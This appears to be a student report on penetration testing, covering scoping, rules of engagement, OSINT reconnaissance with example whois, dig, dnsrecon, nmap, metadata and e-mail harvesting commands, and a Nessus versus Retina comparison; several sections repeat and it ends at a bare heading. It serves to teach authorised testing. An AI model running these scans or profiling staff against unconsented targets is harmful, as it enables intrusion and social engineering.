Verify the ISP's terms of service with the customer. In many commercial situations the ISP will have specific provisions for testing. Review these terms carefully before launching an attack. There are situations where ISPs will shun and block certain traffic that is deemed to be malicious. This may or may not be acceptable to the customer; either way, it needs to be clearly communicated with the customer prior to testing.

Web Hosting
As with the other tests, the scope and timing of the test need to be clearly communicated with the web hosting provider. Also, when communicating with the direct customer you need to clearly articulate that you are only testing for web vulnerabilities; you will not be testing for vulnerabilities that could lead to a compromise of the underlying OS infrastructure.

MSSPs
Managed Security Service Providers (MSSPs) may also need to be notified of testing. Specifically, you will need to notify the provider when you are testing systems and services that they own. However, there are times when you would not notify the MSSP: it may not be in the best interests of the test to notify the MSSP when you are testing its response time. As a general rule of thumb, any time a device or service explicitly owned by the MSSP is being tested, the MSSP needs to be notified.

DoS Testing
Stress testing or Denial of Service testing should be discussed before you start your engagement. It can be one of those topics that many organizations are uncomfortable with due to the potentially damaging nature of the testing. If an organization is only worried about the confidentiality or integrity of their data, stress testing may not be necessary; however, if the organization is also worried about the availability of their services, then the stress testing should be conducted in a non-production environment that is identical to their production environment.

Goals
Every penetration test should be goal oriented. That is, we are testing to identify specific vulnerabilities that lead to a compromise of the business or mission objectives of the customer. It is not about finding unpatched systems; it is about identifying risk that will adversely impact the organization.

Primary
The primary goal of a test should not be driven by compliance, for a number of reasons. First, compliance does not equal security. While it should be understood that many organizations undergo testing because of compliance, compliance should not be the main goal of the test. For example, you may be hired to test as part of a PCI requirement. There are many companies that process credit card information, but the traits that make your target organization unique and viable in a competitive market are what would have the greatest impact on the organization if compromised. Compromising credit cards would be bad. Compromising the email addresses and credit card numbers of all the target organization's customers would be catastrophic.

Secondary
The secondary goals are the ones directly related to compliance. Usually these are tied very tightly to the primary goals. For example, getting the credit cards is the secondary goal; tying that breach of data to the business or mission drivers of the organization is the primary goal. Think of it like this: secondary goals mean something for compliance and IT; primary goals get the attention of the CxOs.

Business Analysis
Before performing a penetration test it is a good idea to define what level of security maturity your customer is at. There are a number of organizations that choose to jump directly into a penetration test without any level of security maturity. For these customers it is often a good idea to perform a vulnerability analysis first. There is absolutely no shame in doing Vulnerability Analysis (VA) work. Remember, the goal is identifying risks to your target organization; it is not about being a tester. If a company is not ready for a full penetration test, it will most likely get far more value out of a good VA than a penetration test. Establish with the customer what information about the systems they want you to know in advance. You may also want to ask them for information about vulnerabilities they already know about; this will save you time, and save them money, if you don't have to re-discover and report on what

they already knew. A full or partial white-box test may bring the customer more value than a black-box test, if the latter isn't absolutely required by compliance. If you are asked to pentest an internal network (and you really should be; assume the attacker started on the inside or is already there), you will need to gather more information about scope.

1.5 Rules of Engagement


While the scope defines what you are supposed to test, the rules of engagement define how testing is to occur. These are two different aspects that need to be handled independently from each other.

Timeline
You should have a clear timeline for your test. While scoping defined the start and end times, now it is time to define everything in between. We understand that the timeline will change as the test progresses; having a rigid timeline is not the goal of creating one. Rather, a timeline at the beginning of a test will allow you and your customer to more clearly identify the work to be done and the people responsible for it. We often use GANTT charts and work breakdown structures to define the work and the amount of time that each specific section will take. Seeing the schedule broken down like this helps you identify the resources that need to be allocated, and it helps the customer identify possible roadblocks that may be encountered during testing.

Disclosure of Sensitive Information


While one of your goals may be to gain access to sensitive information, you may not actually want to view it or download it. This seems odd to newer testers; however, there are a number of situations where you do not want the target data on your system. For example, PHI: under HIPAA this data needs to be protected. In many situations your testing system may not have a firewall or AV running on it, which is a good reason not to want PHI anywhere near your computer. So the question becomes: how can I prove I had access without taking the data? There are a number of ways to prove access without showing data. For example, you can display a database schema, you can show permissions of systems you have accessed, or you can show the files without showing their content. The level of paranoia you want to employ for your tests is something you will need to decide with your customer. Either way, you will want to scrub your test machine of results in between tests; this also applies to the report templates you use. As a special side note, if you encounter illegal data (e.g., child pornography), immediately notify law enforcement, then your customer, in that order. Do not notify the customer first and take direction from them; simply viewing child pornography is a crime.
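As one concrete illustration of proving access without taking data, the sketch below lists table names and row counts from a database the tester has reached, without selecting any row contents. It is shown against a local SQLite file purely for illustration; the same idea applies to information_schema queries on server databases.

# Sketch of "prove access without taking the data": enumerate the schema
# and row counts of a reached database without retrieving row contents.
# The database file name is a hypothetical placeholder.
import sqlite3

conn = sqlite3.connect("reached_database.db")   # hypothetical evidence target
cur = conn.cursor()
cur.execute("SELECT name FROM sqlite_master WHERE type='table'")
for (table,) in cur.fetchall():
    # COUNT(*) demonstrates reach without exposing any record contents.
    count = cur.execute("SELECT COUNT(*) FROM " + table).fetchone()[0]
    print("table", table, ":", count, "rows (contents not retrieved)")
conn.close()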

Evidence Handling
When handling evidence of a test and the differing stages of the report it is incredibly important to take extreme care with the data. Always use encryption and sanitize your test machine between tests. Never hand out USB sticks with test reports out at security conferences. And whatever you do, don't re-use a report from another customer engagement as a template! It's very unprofessional to leave references to another organization in your document.

Capabilities and Technology in Place


Good penetration tests do not simply check for unpatched systems. They also test the capabilities of the target organization. To that end, below is a list of things that you can benchmark while testing.

1. Ability to detect and respond to information gathering
2. Ability to detect and respond to footprinting
3. Ability to detect and respond to scanning and vulnerability analysis
4. Ability to detect and respond to infiltration (attacks)
5. Ability to detect and respond to data aggregation
6. Ability to detect and respond to data exfiltration

When tracking this information, be sure to collect timing information. For example, if a scan is detected, you should be notified, and you should note what level of scan you were performing at the time.
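A lightweight way to collect that timing data is to timestamp every test activity as it happens, so the log can later be lined up against the customer's alert and response records. The sketch below is one minimal, assumed approach (a CSV file and UTC timestamps); the activity names and addresses are illustrative.

# Minimal sketch for collecting the timing data described above: record
# when each test activity occurs, for later comparison with the target
# organization's detection and response logs.
import csv
import datetime

LOG = "benchmark_timeline.csv"

def log_activity(activity, detail):
    """Append a timestamped row describing one test activity."""
    now = datetime.datetime.now(datetime.timezone.utc).isoformat()
    with open(LOG, "a", newline="") as fh:
        csv.writer(fh).writerow([now, activity, detail])

# Illustrative entries; 192.0.2.0/24 is a documentation-only range.
log_activity("scanning", "full TCP sweep of 192.0.2.0/24 started")
log_activity("infiltration", "exploit attempt against hypothetical host web01")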

CHAPTER 2 Review of Literature

In this chapter, Section 2.1 covers the steps of penetration testing, Section 2.2 covers pentest tools, and Section 2.3 covers the advantages and disadvantages of pentesting.
2.1 Steps of Penetration Testing

Pre-engagement Interactions
Intelligence Gathering
Threat Modeling
Vulnerability Analysis
Exploitation
Post Exploitation
Reporting

Pre-engagement Interactions
This phase defines all the pre-engagement activities and scope definitions.

Scoping
Scoping is arguably one of the more important and often overlooked components of a penetration test. Sure, there are lots of books written about the different tools and techniques that can be used for gaining access to a network. However, there is very little on the topic of how to prepare for a test. This can lead to trouble for testers in areas like scope creep, legal issues, and disgruntled customers who will never have you back. The goal of this section is to give you the tools and techniques to avoid these pitfalls. Much of the information contained in this section is the result of the experiences of the testers who wrote it; many of the lessons are ones we learned the hard way.

Scoping is specifically tied to what you are going to test. This is very different from how you are going to test, which we cover in the rules of engagement section. If you are a customer looking for a penetration test, we strongly recommend going to the General Questions section of this document; it covers the major questions that should be answered before a test begins. Remember, a penetration test should not be confrontational. It should not be an activity to see if the tester can "hack" you. It should be about identifying the business risk associated with an attack. To get maximum value, make sure the questions in this document are covered. Further, as the scoping activity progresses, a good testing firm will start to ask additional questions tailored to your organization.

How to Scope
One of the key components for scoping an engagement is trying to figure out exactly how you as a tester are going to spend your time. For example, a customer could want you to test 100 IP addresses and only want to pay you $100,000 for the effort. This roughly breaks down to $1K per IP. Now, would that cost structure hold true if they had one mission-critical application they wanted you to test? Some testers fall into this trap when interacting with a customer to scope a test. Unfortunately, there is going to be some customer education in the process. We are not WalMart; our costs are not linear. So, with that being said, there will be some engagements where you will have a wide canvas of IP addresses to test and choose from to try to access a network as part of a test. There will also be highly focused tests where you will spend weeks (if not months) on one specific application. The key is knowing the difference. To have that level of understanding, you will have to know what the customer is looking for, even when they don't know exactly how to phrase it.

Metrics for Time Estimation


So, now we get to the issue of metrics. Much of this will be based on your experience in the area you are going to test. For example, have you ever done a full, in-depth test of an application? Have you ever tested a wide range of IP addresses? Go back and review your emails and your scan logs for that engagement, and write that number down somewhere. Now, add at least 20% to the time value. Wait, why add 20%? We call this padding; outside of consultant circles it is sometimes referred to as consultant overhead. The reason it is required is that every engagement can have small interruptions to the testing. For example, a network segment may go down (hopefully not due to your testing activities). The time spent not testing does in fact cost you, the tester, money. Another example is meeting creep. There are times when you will find a tremendous vulnerability in a system and share it with the customer, and the customer will then require you to have a meeting with upper management. There should be no doubt that you will attend; however, that meeting will take away from your overall testing time.

What happens if you do not need the 20% overhead? It would be incredibly unethical to simply pocket the cash. Rather, find ways to provide the customer with additional value for the test: walk the company's security team through the steps you took to exploit the vulnerability, provide an executive summary if it was not part of the original deliverable list, or spend some additional time trying to crack the vulnerability that was elusive during the initial testing. Another component of the metrics of time and testing is that your project has to have a definitive drop-dead date. All good projects have a beginning and an end, and your test should as well. You will need a signed Statement of Work specifying the work and the hours required if you've reached the specific date the testing is to end, or if any additional testing or work is requested of you after that date. Some testers have a difficult time doing this because they feel they are being too much of a pain when it comes to cost and hours. However, it has been the experience of the author that if you provide exceptional value for the main test, the customer will not balk at paying you for additional work.
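The padding arithmetic itself is simple enough to sanity-check in a few lines. The hour figures below are illustrative placeholders for numbers you would pull from your own past engagement logs.

# Small sketch of the estimation arithmetic described above: sum the
# work-breakdown items from comparable past engagements, then add the
# roughly 20% consultant overhead for interruptions and meeting creep.
PADDING = 0.20

work_breakdown = {           # hours; illustrative values, not real metrics
    "information gathering": 16,
    "vulnerability analysis": 24,
    "exploitation": 32,
    "reporting": 16,
}

base = sum(work_breakdown.values())
estimate = base * (1 + PADDING)
print("base:", base, "hours; padded estimate:", round(estimate), "hours")
# -> base: 88 hours; padded estimate: 106 hours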

Rules of Engagement
While the scope defines what you are supposed to test, the rules of engagement define how testing is to occur; these two aspects need to be handled independently, as discussed in Section 1.5.

Timeline
The timeline guidance from Section 1.5 applies here as well: define everything between the start and end times, and use the schedule to identify the work to be done and the people responsible for it. There are a number of free GANTT chart tools available on the Internet; find one that works best for you and use it heavily when developing a testing road map. If nothing else, many managers resonate with these tools, and they may be an excellent medium for communicating with the upper management of a target organization.

Locations
It is also important to discuss with the customer which locations they will need you to travel to for testing. This could be something as simple as identifying local hotels, or something as complex as identifying the laws of a specific target country. Sometimes an organization has multiple locations and you will need to identify a few sample locations for testing. In these situations try to avoid having to travel to all customer locations; many times there are VPN connections available for testing.

Disclosure of Sensitive Information
While one of your goals may be to gain access to sensitive information, you may not actually want to view it or download it. This seems odd to newer testers; however, there are a number of situations where you do not want the target data on your system. For example, PHI: under HIPAA this data needs to be protected. In many situations your testing system may not have a firewall or AV running on it. This would be a good situation where you would not want PII anywhere near your computer. So the question becomes: how can I prove I had access without getting the data? There are a number of different ways to prove access without showing data. For example, you can display a database schema, you can show permissions of systems you have accessed, or you can show the files without showing their content. The level of paranoia you want to employ for your tests is something you will need to decide with your customer. Either way, you will want to scrub your test machine of results in between tests. This applies to the report templates you use as well. As a special side note, if you encounter illegal data (e.g., child pornography), immediately notify law enforcement, then your customer, in that order. Do not notify the customer and take direction from them. Simply viewing child pornography is a crime.

Evidence Handling
When handling evidence of a test and the differing stages of the report, it is incredibly important to take extreme care with the data. Always use encryption and sanitize your test machine between tests. Never hand out USB sticks with test reports at security conferences. And whatever you do, don't re-use a report from another customer engagement as a template! It is very unprofessional to leave references to another organization in your document.

Regular Status Meetings
Throughout the testing process it is critical to have regular meetings with the customer informing them of the overall progress of the test. These meetings should be held daily and should be as short as possible. We generally see our meetings cover three very simple things: plans, progress, and problems.

For plans, you should describe what you are planning on doing that day. The reason for this is to make sure you will not be testing during a change or an outage. For progress, you should report what you have completed since the previous meeting. For problems, you should communicate any issues that will impact the overall timing of the test. If specific people are identified to rectify a situation, do not discuss the solution during the status meeting; take the conversation offline. The goal is a meeting of 30 minutes or less, with any longer conversations taken offline with only the specific individuals required to solve the issue.

Time of Day to Test
For many customers there are better times of the day for testing than others. Unfortunately, this can mean many late nights for the penetration testers. Be sure that times of testing are clearly communicated with the customer before testing begins.

Dealing with Shunning
There are times when shunning is perfectly acceptable and times when it may not fit the spirit of the test. For example, if your test is to be a full black-box test where you are testing not only the technology but also the capabilities of the target organization's security team, shunning would be perfectly fine. However, when you are testing a large number of systems in coordination with the target organization's security team, it may not be in the best interests of the test to shun your attacks.

Permission to Test
This is quite possibly the single most important document you can receive when testing. It documents the scope, and it is where the customer signs off on the fact that they are going to be tested for security vulnerabilities and that their systems may be compromised. Further, it should clearly state that testing can lead to system instability and that all due care will be taken by the tester not to crash systems in the process. However, because testing can lead to instability, the customer shall not hold the tester liable for any system instability or crashes. It is critical that testing does not begin until this document is signed by the customer. In addition, some service providers require advance notice and/or separate permission prior to testing their systems. For example, Amazon has an online request form that must be completed, and the request must be approved before scanning any hosts on their cloud.

Legal Considerations
Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed.

For example, any VoIP calls captured in the course of the penetration test may be considered wiretapping in some areas.

Capabilities and Technology in Place


Good penetration tests do not simply check for unpatched systems. They also test the capabilities of the target organization. To that end, below is a list of capabilities that you can benchmark while testing.
1. Ability to detect and respond to information gathering
2. Ability to detect and respond to footprinting
3. Ability to detect and respond to scanning and vulnerability analysis
4. Ability to detect and respond to infiltration (attacks)
5. Ability to detect and respond to data aggregation
6. Ability to detect and respond to data exfiltration

When tracking this information, be sure to collect timing information. For example, if a scan is detected, you should be notified, and you should note what level of scan you were performing at the time.

Intelligence Gathering
This section defines the Intelligence Gathering activities of a penetration test. Its purpose is to provide a living document designed specifically for the pentester performing reconnaissance against a target (typically corporate, military, or related). The document details the thought process and goals of pentesting reconnaissance and, when used properly, helps the reader to produce a highly strategic plan for attacking a target.
What it is

Intelligence Gathering is performing reconnaissance against a target to gather as much information as possible to be utilized when penetrating the target during the vulnerability assessment and exploitation phases. The more information you are able to gather during this phase, the more vectors of attack you may be able to use in the future. Open source intelligence (OSINT) is a form of intelligence collection management that involves finding, selecting, and acquiring information from publicly available sources and analyzing it to produce actionable intelligence.

Why do it

We perform Open Source Intelligence gathering to determine various entry points into an organization. These entry points can be physical, electronic, and/or human. Many companies fail to take into account what information about themselves they place in public and how this information can be used by a determined attacker. On top of that, many employees fail to take into account what information they place about themselves in public and how that information can be used to attack them or their employer.

What is it not

OSINT may not be accurate or timely. The information sources may be deliberately or accidentally manipulated to reflect erroneous data, information may become obsolete as time passes, or it may simply be incomplete. OSINT does not encompass dumpster-diving or any method of retrieving company information off of physical items found on-premises.

Target Selection
Identification and Naming of Target

When approaching a target organization it is important to understand that a company may have a number of different Top Level Domains (TLDs) and auxiliary businesses. While this information should have been discovered during the scoping phase, it is not all that unusual to identify additional servers, domains, and companies that were not part of the initial scope discussed in the pre-engagement phase. For example, a company may have a TLD of .com; however, they may also have .net, .co, and .xxx. These may need to be part of the revised scope, or they may be off limits. Either way, it needs to be cleared with the customer before testing begins. It is also not uncommon for a company to have a number of sub-companies underneath it; for example, General Electric and Procter & Gamble own a large number of smaller companies.
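As a minimal sketch of how this enumeration might start, the standard whois and dig utilities can confirm whether alternate TLDs are registered to the same organization (example.com/.net/.co are placeholder names here):

#whois example.com | grep -i registrant    <= who owns the primary domain
#whois example.net | grep -i registrant    <= does the same organization own the .net?
#dig example.co NS +short                  <= is the alternate TLD live, and who serves it?

Matching registrant or name-server records across TLDs is a quick, low-noise way to build the candidate list that you then clear with the customer.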
Consider any Rules of Engagement limitations

At this point it is a good idea to review the Rules of Engagement. It is common for these to be forgotten during a test. Sometimes, as testers, we get so wrapped up in what we find and the possibilities for attack that we forget which IP addresses, domains, and networks we can attack. Always reference the Rules of Engagement to keep your tests focused. This is not just important from a legal perspective; it is also important from a scope creep perspective. Every time you get sidetracked from the core objectives of the test, it costs you time, and in the long run that can cost your company money.
Consider time length for test

The amount of time for the total test will directly impact the amount of Intelligence Gathering that can be done. There are some tests where the total time is two to three months. In those engagements a testing company would spend a tremendous amount of time looking into each of the core business units and personnel of the company. However, for shorter crystal-box style tests the objectives may be far more tactical. For example, testing a specific web application may not require you to research the financial records of the company CEO.

Consider the end goal of the test
Consider what you want to accomplish from the Information Gathering phase
Make the plan to get it

Open Source Intelligence (OSINT) takes three forms: Passive, Semi-passive, and Active.

Passive Information Gathering: Passive information gathering is generally only useful if there is a very clear requirement that the information gathering activities never be detected by the target. This type of profiling is technically difficult to perform, as we never send any traffic to the target organization, either from one of our hosts or from anonymous hosts or services across the Internet. This means we can only use and gather archived or stored information. As such, this information can be out of date or incorrect, as we are limited to results gathered from a third party.

Semi-passive Information Gathering: The goal of semi-passive information gathering is to profile the target with methods that would appear like normal Internet traffic and behavior. We query only the published name servers for information; we aren't performing in-depth reverse lookups or brute-force DNS requests; we aren't searching for unpublished servers or directories. We aren't running network-level port scans or crawlers, and we are only looking at metadata in published documents and files, not actively seeking hidden content. The key here is not to draw attention to our activities. Post mortem, the target may be able to go back and discover the reconnaissance activities, but they shouldn't be able to attribute the activity back to anyone. Example commands contrasting these levels follow below.

Active Information Gathering: Active information gathering should be expected to be detected by the target and flagged as suspicious or malicious behavior. During this stage we are actively mapping network infrastructure (think full port scans, nmap -p1-65535), actively enumerating and/or vulnerability scanning the open services, and actively searching for unpublished directories, files, and servers. Most of this activity falls into your typical reconnaissance or scanning activities for a standard pentest.
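As a hedged illustration of the difference in footprint, the first command below is semi-passive (a single ordinary query to a published name server), while the other two are unmistakably active (brute-force enumeration and a full port scan). The host names, name server, and wordlist file are placeholders, and dnsrecon flag syntax varies slightly between versions:

#dig @ns1.example.com example.com MX +noall +answer   <= semi-passive: one ordinary DNS query
#dnsrecon -d example.com -t brt -D subdomains.txt     <= active: brute-force subdomain enumeration
#nmap -p1-65535 -sV 192.0.2.10                        <= active: full port scan with version detection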

Corporate Physical Locations

For each location: a full listing of the address, ownership, and associated records (city, tax, legal, etc.), and a full listing of all physical security measures for the location (camera placements, sensors, fences, guard posts, entry control, gates, type of identification, supplier entrances, physical locations based on IP blocks/geolocation services, etc.).

Owner
Land/tax records
Shared/individual

Timezones
Hosts / NOC

Pervasiveness

It is not uncommon for a target organization to have multiple separate physical locations. For example, a bank will have central offices, but it will also have numerous remote branches. While physical and technical security may be very good at central locations, remote locations often have poor security controls.
Relationships

Business partners, customers, suppliers, and rental companies, analyzed via what is openly shared on corporate web pages, etc. This information can be used to better understand the business or organizational projects. For example, what products and services are critical to the target organization? This information can also be used to create successful social engineering scenarios.

Relationships
Shared office space
Shared infrastructure
Rented / Leased Equipment

Logical

Accumulated information for partners, clients and competitors: For each one, a full listing of the business name, business address, type of relationship, basic financial information, basic hosts/network information.
Business Partners

The target's advertised business partners. These are sometimes listed on the main corporate website.

Business Clients

The target's advertised business clients. These are sometimes listed on the main corporate website.

Competitors

Who are the target's competitors? This may be simple (Ford vs. Chevy), or it may require much more analysis.

Touchgraph

A touchgraph (a visual representation of the social connections between people) will assist in mapping out the possible interactions between people in the organization, and how to access them from the outside (when the touchgraph includes external communities and is created with a depth level above 2). The basic touchgraph should reflect the organizational structure derived from the information gathered so far, and further expansion of the graph should be based on it (as it usually represents the focus on the organizational assets better and makes possible approach vectors clear).

Significant company dates


Board meetings
Holidays
Anniversaries
Product/service launches

Professional licenses or registries

Gathering a list of your target's professional licenses and registries may offer insight into not only how the company operates, but also the guidelines and regulations it follows in order to maintain those licenses. A prime example: a company's ISO certification can show that the company follows set guidelines and processes. It is important for a tester to be aware of these processes and how they could affect tests being performed on the organization. A company will often list these details on its website as a badge of honor. In other cases it may be necessary to search the registries for the given vertical in order to see if an organization is a member. The information that is available is very dependent on the vertical market, as well as the geographical location of the company. It should also be noted that international companies may be licensed differently and be required to register with different standards or legal bodies depending on the country.
Org Chart
Position identification

Important people in the organization
Individuals to specifically target

Document Metadata

What is it? Metadata or meta-content provides information about the data/document in scope. It can include information such as the author/creator name, time and date, standards used/referred to, location in a computer network (printer/folder/directory path, etc.), geo-tags, and so on. For an image, the metadata can contain color, depth, resolution, camera make/type, and even coordinates and location information.

Why would you do it? Metadata is important because it contains information about the internal network, usernames, email addresses, printer locations, etc., and will help to create a blueprint of the location. It also contains information about the software used in creating the respective documents. This can enable an attacker to create a profile and/or perform targeted attacks with internal knowledge of the networks and users.

How would you do it? There are tools available to extract metadata from files (pdf/word/image), such as FOCA (GUI-based), metagoofil (Python-based), meta-extractor, and exiftool (Perl-based). These tools are capable of extracting and displaying the results in different formats such as HTML, XML, GUI, and JSON. The input to these tools is mostly a document downloaded from the public presence of the client, which is then analyzed to learn more about it. FOCA, by contrast, helps you search for documents, download them, and analyze them, all through its GUI interface.
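A minimal command-line sketch of this workflow, assuming exiftool and metagoofil are installed (the domain and file names are placeholders, and metagoofil's flag syntax differs slightly between versions):

#exiftool -a -G1 whitepaper.pdf                   <= dump all metadata tags with their group names
#exiftool -Author -Creator -Producer *.pdf        <= pull just the fields that tend to leak usernames and software versions
#metagoofil -d example.com -t pdf,doc,xls -l 100 -o docs -f results.html   <= find, download, and analyze public documents in bulk

Even a handful of documents will often yield internal usernames and the exact office-software versions in use, both of which feed directly into later attack phases.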

Infrastructure Assets

Network blocks owned


Network blocks owned by the organization can be passively obtained by performing whois searches. DNSStuff.com is a one-stop shop for obtaining this type of information. Open source searches for IP addresses can also yield information about the types of infrastructure at the target; administrators often post IP address information in the context of help requests on various support sites.
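As a simple hedged example, a plain whois query against any single address the target is known to use (192.0.2.14 is a documentation placeholder) will usually return the enclosing netblock and its registered owner:

#whois 192.0.2.14                      <= returns the owning netblock (a CIDR range) and organization name
#whois -h whois.radb.net 192.0.2.14    <= routing registry view; may reveal additional routes and AS numbers

Repeating this for mail servers, web servers, and VPN endpoints discovered elsewhere quickly builds a picture of every range the organization controls.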

Email addresses

E-mail addresses provide a potential list of valid usernames and reveal the domain structure. E-mail addresses can be gathered from multiple sources, including the organization's website.
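One hedged way to automate this collection is theHarvester, which scrapes search engines and other public sources for addresses under a given domain (example.com is a placeholder, and the set of supported -b data sources varies by version):

#theHarvester -d example.com -b bing    <= harvest e-mail addresses and hostnames from one source
#theHarvester -d example.com -b all     <= query every configured data source

The address format that comes back (first.last@, flast@, etc.) is itself useful, since it lets you predict usernames for employees found on social media.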

External infrastructure profile


The target's external infrastructure profile can provide a wealth of information about the technologies used internally. This information can be gathered from multiple sources, both passively and actively. The profile should be used in assembling an attack scenario against the external infrastructure.

Technologies used

OSINT searches through support forums, mailing lists, and other resources can gather information on technologies used at the target
Use of social engineering against the identified information technology organization
Use of social engineering against product vendors

Purchase agreements

Purchase agreements contain information about hardware, software, licenses, and additional tangible assets in place at the target.

Remote access

Obtaining information on how employees and/or clients connect to the target for remote access provides a potential point of ingress. Oftentimes a link to a remote access portal is available off of the target's home page, and "how to" documents reveal the applications and procedures remote users follow to connect.

Application usage

Gather a list of known applications used by the target organization. This can often be achieved by extracting metadata from publicly accessible files, as discussed previously.
Defense technologies

Fingerprinting defensive technologies in use can be achieved in a number of ways depending on the defenses in use.
Passive fingerprinting

Search forums and publicly accessible information where technicians of the target organization may be discussing issues or asking for assistance on the technology in use
Search marketing information for the target organization as well as popular technology vendors
Using TinEye (or another image matching tool), search for the target organization's logo to see if it is listed on vendor reference pages or marketing material

Active fingerprinting

Send appropriate probe packets to the public-facing systems to test patterns in blocking; several tools exist for fingerprinting specific WAF types
Header information, both in responses from the target website and within emails, often reveals not only the systems in use but also the specific protection mechanisms enabled (e.g., email gateway anti-virus scanners)
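Two hedged examples of such probing, assuming the wafw00f utility and the Nmap http-waf-detect script are available (the host names are placeholders):

#wafw00f https://www.example.com                        <= sends crafted requests and matches response patterns against known WAF signatures
#nmap -p 443 --script http-waf-detect www.example.com   <= NSE probe that compares responses to benign vs. malicious-looking payloads

Both work by eliciting the blocking behavior described above; run them only against systems that are in scope, since they are active probes.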

Human capability

Discovering the defensive human capability of a target organization can be difficult. There are several key pieces of information that could assist in judging the security of the target organization.

Check for the presence of a company-wide CERT/CSIRT/PSRT team
Check advertised jobs to see how often a security position is listed
Check advertised jobs to see if security is listed as a requirement for non-security jobs (e.g., developers)
Check for outsourcing agreements to see if the security of the target has been outsourced partially or in its entirety
Check for specific individuals working for the company who may be active in the security community

Financial Reporting

The target's financial reporting will depend heavily on the location of the organization. Reporting may also be made through the organization's head office and not for each branch office.

What is it: EDGAR (the Electronic Data Gathering, Analysis, and Retrieval system) is a database of the U.S. Securities and Exchange Commission (SEC) that contains registration statements, periodic reports, and other information for all companies (both foreign and domestic) that are required by law to file.

Why do it: EDGAR data is important because, in addition to financial information, it identifies key personnel within a company who may not be otherwise notable from the company's website or other public presence. It also includes statements of executive compensation, names and addresses of major common stock owners, a summary of legal proceedings against the company, economic risk factors, and other potentially interesting data.

2.2 Pentest Tools

OpenVAS
OpenVAS is a vulnerability scanner that was forked from the last free version of Nessus after that tool went proprietary in 2005. OpenVAS plugins are still written in the Nessus NASL language. The project seemed dead for a while, but development has since restarted.

Core Impact
Core Impact isn't cheap (be prepared to spend at least $30,000), but it is widely considered to be the most powerful exploitation tool available. It sports a large, regularly updated database of professional exploits, and can do neat tricks like exploiting one machine and then establishing an encrypted tunnel through that machine to reach and exploit other boxes. Other good options include Metasploit and Canvas.

Nexpose
Rapid7 Nexpose is a vulnerability scanner which aims to support the entire vulnerability management lifecycle, including discovery, detection, verification, risk classification, impact analysis, reporting, and mitigation. It integrates with Rapid7's Metasploit for vulnerability exploitation. It is sold as standalone software, an appliance, a virtual machine, or as a managed service or private cloud deployment. User interaction is through a web browser. There is a free "community edition" for scanning up to 32 IPs, as well as Express ($3,000 per user per year), Express Pro ($7,000 per user per year), and Enterprise (starting at $25,000 per user per year) editions.

GFI LanGuard
GFI LanGuard is a network security and vulnerability scanner designed to help with patch management, network and software audits, and vulnerability assessments. The price is based on the number of IP addresses you wish to scan. A free trial version (up to 5 IP addresses) is available.

QualysGuard
QualysGuard is a popular SaaS (software as a service) vulnerability management offering. Its web-based UI offers network discovery and mapping, asset prioritization, vulnerability assessment reporting, and remediation tracking according to business risk. Internal scans are handled by Qualys appliances which communicate back to the cloud-based system.

MBSA
Microsoft Baseline Security Analyzer (MBSA) is an easy-to-use tool designed for the IT professional that helps small and medium-sized businesses determine their security state in accordance with Microsoft security recommendations and offers specific remediation guidance. Built on the Windows Update Agent and Microsoft Update infrastructure, MBSA ensures consistency with other Microsoft management products including Microsoft Update (MU), Windows Server Update Services (WSUS), Systems Management Server (SMS) and Microsoft Operations Manager (MOM). Apparently MBSA on average scans over 3 million computers each week.

Secunia PSI
Secunia PSI (Personal Software Inspector) is a free security tool designed to detect vulnerable and outdated programs and plug-ins that expose your PC to attack. Attacks exploiting vulnerable programs and plug-ins are rarely blocked by traditional anti-virus programs. Secunia PSI checks only the machine it is running on, while its commercial sibling Secunia CSI (Corporate Software Inspector) scans multiple machines on a network.

Nipper
Nipper (short for Network Infrastructure Parser, previously known as CiscoParse) audits the security of network devices such as switches, routers, and firewalls. It works by parsing and analyzing the device configuration file, which the Nipper user must supply. This was an open source tool until its developer (Titania) released a commercial version.

SAINT
SAINT is a commercial vulnerability assessment tool. Like Nessus, it used to be free and open source but is now a commercial product. Unlike Nexpose and QualysGuard, SAINT runs on Linux and Mac OS X. In fact, SAINT is one of the few scanner vendors that does not support (run on) Windows at all.

Nessus
Nessus is an automatic vulnerability scanner that can detect most known vulnerabilities, such as misconfigurations, default passwords, unpatched services, etc.

Pros and Cons of Nessus
Pros:
a. Free vulnerability scanning
b. Checks for the effectiveness of patching
Cons:
a. Some GUI issues still arise
b. Less open than it used to be
c. Definitely appears hostile when used

Nessus vs Retina - Vulnerability Scanning Tools Evaluation

The Test Environment
The tested vulnerability scanning tools were installed on a Windows 7 Pro PC.

The Scanning Process
Both scanners were started with full port scanning enabled, scanning safety disabled, and all available plugins activated. NOTE: Since Retina does not have Web application analysis, Nessus was run twice, once with Web application scanning disabled and once with it enabled, in order to make a meaningful performance comparison.

Performance

The Nessus scanner without the Web application scan took 8 minutes to complete the scan
The Nessus scanner with the Web application scan took 67 minutes to complete the scan
The Retina scanner took 38 minutes to complete the scan

Results

Both scanners failed to identify the target operating system.
The Nessus scanner identified the expected open ports and concluded that MySQL does not accept connections from unauthorized IPs. On a repeat scan, it regenerated the same results.
The Retina scanner identified HTTP and TCP port 631 (IPP printer sharing). It did not identify the MySQL port as open. On the Web server, it identified a significant number of vulnerabilities but did not collect any information from the HTTP server. On a repeat scan it missed the HTTP port and only identified the MySQL port.
The Nessus scanner running the Web application scan repeated the previous results; additionally, it identified a significant number of WebApp vulnerabilities and collected information from HTTP through web mirroring.

Conclusions
Both scanners performed vulnerability identification very well but missed the OS identification. Both also manifested flaws:
1. Nessus missed the IPP port every time.
2. Retina produced erroneous scan results, identifying different ports and vulnerabilities during different sessions, while no configuration changes were made to the test environment.
In terms of speed, without the Web application scan Nessus performed much faster than Retina. On the other hand, with the Web application scan active, Nessus was much slower than Retina. In terms of scan depth, Nessus has a small advantage, since it includes a web mirroring tool that is very helpful against HTTP. It can be clearly concluded that these tools cannot be used as the sole source of information when performing a vulnerability test. One must also utilize network mapping (NMAP, LanGuard), OS identification (NMAP), and specific application vulnerability scanners (ParosProxy, WebScarab for the Web) for maximum effect. In a direct comparison, Nessus wins because:
1. Retina manifested erroneous results on repeat scans.
2. The Nessus package includes a Web application scanning module, which in eEye products must be purchased as a separate application.

NMAP
